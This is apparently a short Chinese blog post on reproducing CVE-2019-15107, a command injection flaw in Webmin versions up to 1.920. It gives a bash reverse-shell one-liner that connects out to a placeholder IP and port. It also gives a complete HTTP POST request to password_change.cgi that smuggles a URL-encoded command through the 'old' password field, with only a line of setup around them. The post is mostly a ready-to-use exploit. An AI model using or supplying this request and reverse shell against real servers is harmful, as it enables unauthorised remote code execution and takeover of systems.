Webmin

1.漏洞复现

CVE-2019-15107

影响范围:Webmin <= 1.920

先用NC监听,使用以下请求包反弹shell

echo 'bash -i >& /dev/tcp/IP/端口 0>&1' > /tmp/shell;bash /tmp/shell
POST /password_change.cgi HTTP/1.1
Host: IP:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://IP与Host一致:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

user=hacker&pam=&expired=2&old=命令URL编码&new1=test2&new2=test2
posted @ 2023-01-17 02:16  Hacker&Cat  阅读(60)  评论(0编辑  收藏  举报